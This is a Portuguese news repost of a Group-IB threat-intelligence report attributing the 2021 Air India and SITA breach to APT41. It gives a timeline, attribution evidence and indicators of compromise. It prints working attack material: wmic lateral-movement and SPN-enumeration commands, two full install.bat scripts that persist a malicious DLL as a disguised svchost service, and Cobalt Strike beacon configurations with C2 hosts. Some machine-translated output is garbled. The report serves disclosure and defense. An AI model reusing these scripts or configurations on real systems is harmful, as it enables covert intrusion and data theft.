Roubo de grande companhia aérea

blank

Roubo de grande companhia aérea

APT41 provavelmente por trás de um ataque massivo à cadeia de suprimentos

Google News

Em 4 de março de 2021, a SITA, fornecedora internacional de serviços de TI para a indústria de transporte aéreo em todo o mundo, disse que havia sofrido um incidente de segurança. O anúncio, no entanto, não estava recebendo a atenção que merecia até que a Air India , um dos clientes da SITA, relatou uma violação maciça de dados de passageiros em 21 de maio, causada por um ataque anterior contra a SITA. Entre março e maio, várias companhias aéreas, incluindo Singapore Airlines, Malaysia Airlines e outras, divulgaram violações de dados. Todas essas empresas eram clientes da SITA. Depois que a Air India revelou os detalhes de sua violação de segurança, ficou claro que as transportadoras provavelmente estavam lidando com um dos maiores ataques à cadeia de suprimentos da história do setor de aviação civil.

Usando suas ferramentas de caça a ameaças externas, a equipe de Threat Intelligence do Group-IB atribuiu o incidente da Air India com confiança moderada ao ator de ameaça do estado-nação chinês conhecido como APT41 . A campanha foi batizada de ColunmTK .

Nesta postagem do blog, você encontrará:

  • Detalhes anteriormente desconhecidos sobre a campanha ColunmTK
  • Conexões entre o incidente de segurança da SITA e a violação de dados da Air India
  • Evidência de estações de trabalho comprometidas e exfiltração de 200 MB de dados da rede da Air India
  • Descrições de TTPs usados ​​durante a campanha ColunmTK
  • Conexões entre o APT41 e a infraestrutura usada durante a campanha ColunmTK

As ramificações potenciais desse incidente para todo o setor de aviação civil e transportadoras que ainda podem descobrir vestígios do ColunmTK em suas redes são significativas. Para ajudar as empresas a detectar e procurar ColunmTK, fornecemos uma lista completa de indicadores de comprometimento (IOCs) que recuperamos. MITER ATT & CK, MITER Shield e recomendações estão disponíveis no final desta postagem do blog.

A equipe de Inteligência de Ameaças do Grupo IB informou a CERT India e a Air India sobre suas descobertas para que eles possam tomar as medidas necessárias para mitigar a ameaça.

Fundo
Em 21 de maio, a Air India, a companhia aérea da Índia, publicou um comunicado oficial em seu site sobre uma violação de dados. O anúncio revelou que a violação foi causada por um incidente em fevereiro no provedor de serviços de TI da companhia aérea, SITA PSS, que é responsável pelo processamento de informações de identificação pessoal (PII) dos clientes. Descobriu-se que o ataque cibernético da SITA afetou 4.500.000 pessoas em todo o mundo, incluindo dados relacionados aos clientes da Air India.
blank
Pouco depois do anúncio público da Air India, o banco de dados supostamente relacionado à violação de segurança foi colocado à venda em um mercado clandestino por US $ 3.000.
blank
De acordo com o sistema Threat Intelligence & Attribution do Group-IB , o suposto banco de dados foi publicado em um recurso fraudulento conhecido por revender dados que foram publicados em vários sites de vazamento de dados. Como o banco de dados nunca apareceu em nenhum lugar da dark web, nem de domínio público, os pesquisadores do Grupo-IB o consideraram falso e decidiram analisar mais a fundo o que se sabia sobre o ataque real e descobriram que a postagem sobre listagem na Air India supostos dados não tiveram nada a ver com o que aconteceu na realidade. A equipe de Threat Intelligence do Group-IB logo percebeu que estava lidando com um sofisticado ator de ameaça de estado-nação, em vez de outro grupo cibercriminoso com motivação financeira.
Compromisso da rede da Air India
Em meados de fevereiro de 2021, o sistema Threat Intelligence & Attribution do Group-IB detectou dispositivos infectados que faziam parte da rede de computadores da Air India. A partir de pelo menos 23 de fevereiro de 2021, um dispositivo dentro da rede da empresa comunicou-se com um servidor com o endereço IP 185 [.] 118 [.] 166 [.] 66. De acordo com o Network Graph do Group-IB, este servidor hospedou Cobalt Strike, um framework de pós-exploração popular, desde 11 de dezembro de 2020 (voltaremos a ele um pouco mais tarde).

blank

Vida útil de uma tag Cobalt Strike no gráfico de rede do Grupo IB

O paciente zero que iniciou a comunicação com o servidor C&C foi um dispositivo denominado SITASERVER4 com o endereço IP local 172 [.] 16 [.] 11 [.] 103. Com base em como é nomeado, é justo presumir que o dispositivo está relacionado a um servidor de processamento de dados SITA.

Depois que os invasores estabeleceram persistência na rede e obtiveram as senhas, eles começaram a se mover lateralmente. O ator da ameaça coletou informações dentro da rede local, incluindo nomes de recursos de rede e seus endereços.

Abaixo estão alguns exemplos de comandos que foram usados ​​para movimento lateral:

Data Nome do dispositivo Comando
02/03/21 06:43 PM WEBSERVER3 wmic /node:172.16.2[.]114 / user: [REMOVIDO] / senha: [REMOVIDO] chamada de processo criar “c: \ users \ Public \ install.bat”.
03/03/21 02:05 AM AILOAPOTHDT076 ping AILCCUALHSV002.
Os resultados de alguns comandos:
Hospedeiro Comando Shell Resultado do Comando
AILCCUALHSV002 – 172 [.] 24 [.] 3 [.] 24 ipconfig / all Nome do host de configuração de IP do Windows. . . . . . . . . . . . : AILCCUALHSV002 Sufixo DNS primário. . . . . . . : ad [.] airindia [.] em tipo de nó. . . . . . . . . . . . : Roteamento de IP híbrido habilitado. . . . . . . . : Nenhum proxy WINS ativado. . . . . . . . : Nenhuma lista de pesquisa de sufixo DNS. . . . . . : ad [.] airindia [.] em
AILCCUALHSV001- 172 [.] 24 [.] 3 [.] 22 setspn -T ad [.] airindia [.] em -Q * / * | findstr SQL MSSQLSvc / AILDELCCPDT011.ad [.] Airindia [.] Em MSSQLSvc / AILDELCCPDT011.ad [.] Airindia [.] Em: 1433 MSSQLSvc / AILDELCCPDT017.ad [.] AirindiaDELD [. [.] em: 1433 MSSQLSvc / AILDELCCPDT018.ad [.] airindia [.] em MSSQLSvc / AILDELCCPDT018.ad [.] airindia [.] em: 1433 MSSQLSvc / AASBOMCGODT009.ad [.] airindia [.] airindia [.] /AILDELCCPDT020.ad[.]airindia[.]in MSSQLSvc / AILDELCCPDT020.ad [.] Airindia [.] In: 1433 MSSQLSvc / AILDELCCPDT023.ad [.] Airindia [.] Em MSSQLSvcad [.] Airindia [.] In: 1433 MSSQLSvc / AILDELCCPDT023.ad [.] Airindia [.] .] em: 1433 MSSQLSvc / AILDELCCPDT032.ad [.] airindia [.] em MSSQLSvc / AILDELCCPDB01.ad [.] airindia [.] em: 17001 MSSQLSvc / AILDELCCPDB01.ad [.] airindia [.] MAAAUCDT614.ad [.] Airindia [.] Em MSSQLSvc / AILMAAAUCDT614.ad [.] Airindia [.] Em MSSQLSvc / AILDELGSDDT406.ad [.] Airindia [.] Em MSSQLSvc / AILBOMAPT.] MSSQLSvc / TRCOM.ad [.] Airindia [.] Em:1433 MSSQLSvc / ATLDELGSDDT027.ad [.] Airindia [.] Em MSSQLSvc / AILOAPDITDT008.ad [.] Airindia [.] Em: 1433 MSSQLSvc / AILOAPDITDT008.ad [.] AirindiaD [.] airindia [.] em MSSQLSvc / AILDELCCPDT041.ad [.] airindia [.] em: 1433 MSSQLSvc / AILMAAAUCDT179.ad [.] airindia [.] em

Os invasores exfiltraram hashes NTLM e senhas de texto simples de estações de trabalho locais usando hashdump e mimikatz. Os invasores tentaram aumentar os privilégios locais com a ajuda do malware BadPotato. BadPotatoNet4.exe foi carregado em um dos dispositivos dentro da rede da vítima com o nome SecurityHealthSystray.exe. De acordo com nossos dados, pelo menos 20 dispositivos da rede da Air India foram comprometidos durante a fase de movimento lateral. Os invasores usaram solicitações DNS-txt para conectar os bots ao servidor C&C. Os seguintes domínios foram usados ​​para tunelamento DNS.

  • ns2 [.] colunm [.] tk;
  • ns1 [.] colunm [.] tk.

O nome da campanha, ColunmTK , é derivado desses domínios inicialmente descobertos.

Também foi descoberto que os invasores extraíram 23.339.032 bytes de dados dos seguintes dispositivos:

  • SITASERVER4
  • AILCCUALHSV001
  • AILDELCCPOSCE01
  • AILDELCCPDB01
  • WEBSERVER3

De acordo com os dados de Threat Intelligence & Attribution do Group-IB, os dispositivos comprometidos estavam localizados em sub-redes diferentes, o que pode indicar que o comprometimento afetou vários segmentos da rede da Air India.

De acordo com os registros do Grupo-IB, o ataque à Air India durou pelo menos 2 meses e 26 dias. Os invasores levaram 24 horas e 5 minutos para espalhar os sinalizadores de Cobalt Strike para outros dispositivos na rede da companhia aérea.

blank

Linha do tempo ColunmTK
O vetor de ataque inicial permanece desconhecido. No entanto, as evidências que mostram que o primeiro dispositivo que começou a se comunicar com o servidor C&C controlado pelo adversário foi um servidor SITA e o fato de a SITA ter notificado a Air India sobre seu incidente de segurança dá motivos razoáveis ​​para acreditar que o comprometimento da rede da Air India foi o resultado de um ataque sofisticado à cadeia de suprimentos, que pode ter começado com a SITA. Se essa conclusão for verdadeira, isso afetaria outros clientes da SITA, que, segundo a empresa , representam cerca de 90% dos negócios de aviação mundial.
Conexões com APT41

Os pesquisadores do Grupo IB acreditam com confiança moderada que a campanha do ColunmTK foi realizada pelo APT41, um prolífico ator de ameaça do Estado-nação que fala chinês. Acredita-se que APT41, também conhecido como WICKED SPIDER (PANDA), Winnti Umbrella e BARIUM, tenha se envolvido em espionagem patrocinada pelo Estado nos interesses da China, bem como cometido crimes cibernéticos com motivação financeira. De acordo com o sistema Threat Intelligence & Attribution do Group-IB, o agente da ameaça está ativo desde pelo menos 2007.

APT41 é conhecido por roubar certificados digitais para suas operações de espionagem cibernética. A Índia é um alvo frequente dos adversários dos Estados-nação chineses.

Ao analisar a infraestrutura de rede do servidor C&C envolvido no ataque cibernético contra a Air India, o sistema Threat Intelligence & Attribution do Group-IB revelou que o ator da ameaça usou um certificado SSL específico, que foi detectado em apenas cinco hosts.

endereço de IP Localização ASN Organização
185.118.164 [.] 198 RU AS44493 Chelyabinsk-Signal LLC
104,224,169 [.] 214 nós AS19181 IT7 Networks Inc
45,61,136 [.] 199 nós AS53667 BL Networks
185,118,166 [.] 66 RU AS44493 Chelyabinsk-Signal LLC
149,28,134 [.] 209 SG AS20473 Vultr Holdings, LLC

blank

Relações de rede entre hosts com uma impressão digital específica apresentada no sistema Threat Intelligence & Attribution do Group-IB

Vamos examinar mais de perto esses cinco endereços IP.

Um deles, 45 [.] 61 [.] 136 [.] 199, foi atribuído ao APT41 (também conhecido como Bário) pela Microsoft em sua pesquisa recente.

Vale a pena olhar outro endereço IP da lista: 104 [.] 224 [.] 169 [.] 214. Este endereço IP foi usado como um registro A para dois domínios: server04 [.] Dns04 [.] Com e service04 [.] Dns04 [.] Com. O endereço IP também foi usado para hospedar a estrutura Cobalt Strike e compartilhou um certificado SSL, b3038101fd0e8b11c519f739f12c7e9b60234d3b, com o endereço IP 185.118.166 [.] 66 da ColunmTK. Ao analisar os subdomínios dns04 [.] Com, descobrimos que esses domínios estavam estacionados no endereço IP 127.0.0.1 na mesma data: 15 de abril de 2021. De acordo com os pesquisadores do Grupo-IB, o APT41 geralmente estaciona seus domínios por algum tempo em 127.0.0.1 após o término de suas campanhas.

blank

Relações de rede entre hosts estacionados em 127.0.0.1.
Fonte: Group-IB Threat Intelligence & Attribution

Outro domínio interessante é service [.] Dns22 [.] Ml. Este domínio compartilhou o certificado SSL b3038101fd0e8b11c519f739f12c7e9b60234d3b com o endereço IP da ColunmTK e estava estacionado em 127.0.0.1 em 15 de janeiro de 2021. Os pesquisadores de segurança descobriram que o endereço IP 104 [.] 224 [.] 169 [.] 214 foi usado como o endereço IP para um shellcode loader nas campanhas anteriores do APT41, nas quais o serviço de domínio [.] dns22 [.] ml também foi usado.

Os pesquisadores do Grupo IB descobriram um arquivo chamado “Install.bat” ( SHA1-7185bb6f1dddca0e6b5a07b357529e2397cdee44 ). O arquivo foi carregado pelos atacantes para alguns dos dispositivos comprometidos dentro da rede da Air India como parte da campanha ColunmTK. O arquivo é muito semelhante a um usado por APT41 em uma campanha diferente descritapor pesquisadores da FireEye.

Em ambos os casos, os arquivos foram usados ​​para estabelecer a persistência na rede. Os arquivos são muito semelhantes na maneira como iniciam um arquivo DLL como um serviço e criam chaves no registro.

O conteúdo do arquivo “install.bat” da campanha This is a Test do APT41:
@echo off
set "WORK_DIR=C:\Windows\System32"
set "DLL_NAME=storesyncsvc.dll"
set "SERVICE_NAME=StorSyncSvc"
set "DISPLAY_NAME=Storage Sync Service"
set "DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly."
sc stop %SERVICE_NAME%
sc delete %SERVICE_NAME%
mkdir %WORK_DIR%
copy "%
dp0%DLL_NAME%" "%WORK_DIR%" /Y
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "%SERVICE_NAME%" /t REG_MULTI_SZ /d "%SERVICE_NAME%" /f
sc create "%SERVICE_NAME%" binPath= "%SystemRoot%\system32\svchost.exe -k %SERVICE_NAME%" type= share start= auto error= ignore DisplayName= "%DISPLAY_NAME%"
SC failure "%SERVICE_NAME%" reset= 86400 actions= restart/60000/restart/60000/restart/60000
sc description "%SERVICE_NAME%" "%DESCRIPTION%"
reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "%WORK_DIR%\%DLL_NAME%" /f
net start "%SERVICE_NAME%"
O conteúdo do arquivo “install.bat” da campanha ColunmTK:
@echo off
set "WORK_DIR=c:\Windows\System32"
set "DLL_NAME=SecurityHealthSystray.dll"
set "SERVICE_NAME=COMSysConfig"
set "DISPLAY_NAME=COM+ Update Service"
set "DESCRIPTION="
sc stop %SERVICE_NAME%
sc delete %SERVICE_NAME%
mkdir %WORK_DIR%
copy "%
dp0%DLL_NAME%" "%WORK_DIR%" /Y
dp0SecurityHealthSystra.ocx" "%WORK_DIR%\SecurityHealthSystra.ocx" /Y
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "%SERVICE_NAME%" /t REG_MULTI_SZ /d "%SERVICE_NAME%" /f
sc create "%SERVICE_NAME%" binPath= "%SystemRoot%\system32\svchost.exe -k %SERVICE_NAME%" type= share start= auto error= ignore DisplayName= "%DISPLAY_NAME%"
SC failure "%SERVICE_NAME%" reset= 86400 actions= restart/60000/restart/60000/restart/60000
sc description "%SERVICE_NAME%" "%DESCRIPTION%"
reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "%WORK_DIR%\%DLL_NAME%" /f
net start "%SERVICE_NAME%"
Os pesquisadores do Grupo IB acreditam com confiança moderada que a campanha do ColunmTK contra a Air India foi realizada pelo ator de ameaça do Estado-nação chinês APT41.

blank

Atribuição da campanha ColunmTK contra a Air India ao APT41.
ColunmTK MITER ATT & CK e MITER SHIELD
Abaixo estão os indicadores que foram usados ​​nesta campanha, bem como o mapeamento MITER ATT & CK e uma lista correspondente de soluções de mitigação. As empresas devem usar o MITER ATT & CK para se preparar melhor para ataques e saber quais técnicas são necessárias para mitigar os riscos de segurança associados a esse ator de ameaça.
blank
Saiba mais sobre os produtos e serviços do Group-IB:
Indicadores de compromisso
Abaixo estão os indicadores que foram usados ​​nesta campanha, bem como o mapeamento MITER ATT & CK e uma lista correspondente de soluções de mitigação. As empresas devem usar o MITER ATT & CK para se preparar melhor para ataques e saber quais técnicas são necessárias para mitigar os riscos de segurança associados a esse ator de ameaça.
Indicadores de rede:
  • 185,118,164 [.] 198;
  • 104,224,169 [.] 214;
  • 45,61,136 [.] 199;
  • 185,118,166 [.] 66;
  • 149,28,134 [.] 209;
  • colunm [.] tk.
Nome do arquivo MD5
install.bat 20aebf6e20c46b6bfe44f2828adf3b91
SecurityHealthSystray.dll b6b06a95cfeeee0efe8bc0cd54eac71d
SecurityHealthSystray.ocx 83249cff833182b3299cbd4aac539c9a
BadPotatoNet4.exe 143278845a3f5276a1dd5860e7488313
COMSysUpdate.dll 559b7150d936fffe728092b160c14d28
install.bat 9337952aa3be0dacfc12898df3180f02
SecurityHealthSystray.ocx 212784cf25f0adfaf9ba46db41c373d5
COMSysUpdate.ocx d414c7ede5a9d6d30e6d3fe547e27484
ntoskrnl.exe 83e6da9cd8ccf9b0c04f00416b091076
COMSysUpdate.dll 7b501402c843034cd79151257aca189e
COMSysUpdate.ocx 69f5c5f67850acdb373ddd106adce48c
SecurityHealthSystray.dll b071a62d2dd745743c6de5f115d633b1
SecurityHealthSystray.ocx 019122b1d783646f99c73a3c399cc334
install.bat f61dbac694d34c96830f184658610261
SecurityHealthSystra.ocx fc208a4d04c085edcea1ec5f402057f9
SecurityHealthSystray.dll 5528bb928e02926179fca52dd388b1f0
SecurityHealthSystray.dll b8ecab09b7bfb42b9ace3666edf867a7
SecurityHealthSystra.ocx c4be6b466807540a22f62ffa6829540f
SecurityHealthSystra.ocx a00ab8ac0f11c3fcd5c557729afcbf89
Configuração de baliza de 185.118.166 [.] 66
"post-get.verb" : "",
"process-inject-stub" : "d5nX4wNnwCo18Wx3jr4tPg==",
"http-get.uri" : "cs[.]colunm[.]tk,/dpixel",
"http-get.server.output" : "",
"post-ex.spawnto_x64" : "%windir%\\sysnative\\rundll32.exe",
"post-ex.spawnto_x86" : "%windir%\\syswow64\\rundll32.exe",
"cryptoscheme" : 0,
"process-inject-transform-x64" : "",
"process-inject-transform-x86" : "",
"maxdns" : 255,
"process-inject-min_alloc" : 0,
"http-post.client" : "&Content-Type: application/octet-streamid",
"dns_sleep" : 0,
"ssl" : true,
"SSH_Password_Pubkey" : "",
"http-post.uri" : "/submit.php",
"Proxy_UserName" : "",
"cookieBeacon" : 1,
"CFGCaution" : 0,
"process-inject-start-rwx" : 64,
"spawto" : "",
"SSH_Host" : "",
"stage.cleanup" : 0,
"SSH_Username" : "",
"watermark" : 305419896,
"process-inject-use-rwx" : 64,
"dns_idle" : 0,
"sleeptime" : 60000,
"dns" : false,
"publickey" : "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQ
CBkyCWDMC1Q6VqRZIY35+iU7KtrHy9+HnzzPxCetQ5toPMCqlwQEB9hj38O
nrVdGJYcvb8X36PIo8JBQSIB+ejM0xYaWwWIoLYhG1CSUJPgLc24wjjkW3/2wB
uLrgTuYxNeylf75fE6cQtSeimLeHp/XjyQPfYbUQgiCSqs7KSUwIDAQABAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAA==",
"pipename" : "",
"SSH_Password_Plaintext" : "",
"Proxy_Password" : "",
"Proxy_HostName" : "",
"host_header" : "",
"jitter" : 0,
"killdate" : 0,
"text_section" : 0,
"port" : 8443,
"shouldChunkPosts" : 0,
"http-get.client" : "Cookie",
"funk" : 0,
"SSH_Port" : 0,
"http-get.verb" : "GET",
"proxy_type" : 2,
"user-agent" : "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.
1; WOW64; Trident/5.0; MANM; MANM)"
Configuração de baliza de 149.28.134 [.] 209
{
    "func": 0,
    "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe",
    "DNS_sleep(ms)": 0,
    "HostHeader": "",
    "Maxdns": 255,
    "Proxy_AccessType": "2 (use IE settings)",
    "SpawnTo": "AAAAAAAAAAAAAAAAAAAAAA==",
    "binary.http-get.server.output": "AAAABAAAAAEAAA1NAAAAAgAADSYAAAANAAAADwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
    "bUsesCookies": "True",
    "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe",
    "Watermark": 305419896,
    "bProcInject_MinAllocSize": 17500,
    "bProcInject_StartRWX": "True",
    "HttpGet_Verb": "GET",
    "version": "4",
    "PipeName": "",
    "UserAgent": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "KillDate": "0",
    "HttpPost_Verb": "POST",
    "HttpPostChunk": 0,
    "textSectionEnd (0 if !sleep_mask)": 154122,
    "BeaconType": "8 (HTTPS)",
    "HttpGet_Metadata": [
        "Host: fortawesome.com",
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Encoding: gzip, deflate",
        "Referer: https://fortawesome.com/",
        "_fortawesome_session=",
        "Cookie"
    ],
    "ProcInject_PrependAppend_x86": "AAAABJCQkJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
    "DNS_idle": "8.8.8.8",
    "ProcInject_AllocationMethod": "NtMapViewOfSection",
    "ProcInject_PrependAppend_x64": "AAAABJCQkJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
    "Jitter": 37,
    "SleepTime": 1000,
    "bStageCleanup": "True",
    "C2Server": "149.28.134.209,/users/sign_in",
    "MaxGetSize": 1404878,
    "CryptoScheme": 0,
    "PublicKey": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCLWqwFbcEMqEaiaw6K1ORaRyQ62LPDVjE/Wb6tbstdNR2Yp4r8dmKAS7GCCboKK5zCbAmahgKWF59UWk2X/AKPSZv21NLWQ+IZj4CU6ic5A7avc7/VnlbS4C+skd68xO7/3IlyVMAWOQg2vc7AgCEOppcNMLkqYdwE2igRIqIAxQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
    "obfuscate_section": "AGACAFH9AgAAAAMAwKADAACwAwAwzgMAAAAAAAAAAAA=",
    "ProcInject_Execute": [
        "6"
    ],
    "ProcInject_Stub": "UGQyVORjQ+JF+/sEjjvVYA==",
    "bProcInject_UseRWX": "True",
    "HttpPost_Metadata": [
        "Host: fortawesome.com",
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Encoding: gzip, deflate",
        "__uid",
        "remember_me=on&authenticity_token="
    ],
    "bCFGCaution": "False",
    "Port": 443,
    "HttpPostUri": "/signup/custom"
}

Fonte: https://blog.group-ib.com/colunmtk_apt41

Roubo de grande companhia aérea



Receba nossas notícias em tempo real nos seguindo pelos aplicativos de mensagem abaixo:

blank

Assine nossa Newsletter


Receba todo final de tarde as últimas notícias do DefesaTV em seu e-mail, é de graça!

Assista nosso último episódio: